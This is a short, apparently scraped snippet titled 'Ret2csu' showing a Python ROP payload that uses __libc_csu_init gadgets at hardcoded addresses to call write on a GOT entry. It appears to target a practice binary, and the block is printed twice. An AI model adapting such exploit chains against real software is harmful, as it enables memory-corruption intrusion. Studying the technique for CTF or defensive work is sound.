Ret to csu

gad_1 = p64(0x00000000004011d1) # pop rsi, pop r15, ret
gad_csu = p64(0x00000000004011ca) # pop rbx, rbp, r12, r13, r14, r15
gad_csu_call = p64(0x04011B0)
pop_rdi_ret = p64(0x00000000004011d3)
write = p64(0x40114a)
got_w = p64(0x404018)
rdx_val = 30

pay = bytes(("A" * 72).encode()) + gad_csu + p64(0x0) + p64(0x1) + p64(fd) + got_w + p64(rdx_val) + got_w + gad_csu_call

 

Based on the research of Dr. Ripol and Dr. Hector from blackhat  2018

Ret to csu gad_1 = p64(0x00000000004011d1) # pop rsi, pop r15, ret gad_csu = p64(0x00000000004011ca) # pop rbx, rbp, r12, r13, r14, r15 gad_csu_call = p64(0x04011B0) pop_rdi_ret = p64(0x00000000004011d3) write = p64(0x40114a) got_w = p64(0x404018) rdx_val = 30 pay = bytes(("A" * 72).encode()) + gad_csu + p64(0x0) + p64(0x1) + p64(fd) + got_w + p64(rdx_val) + got_w + gad_csu_call Based on the research of Dr. Ripol and Dr. Hector from blackhat  2018

Ret2csu

By Aneesh Dogra

Ret2csu

  • 423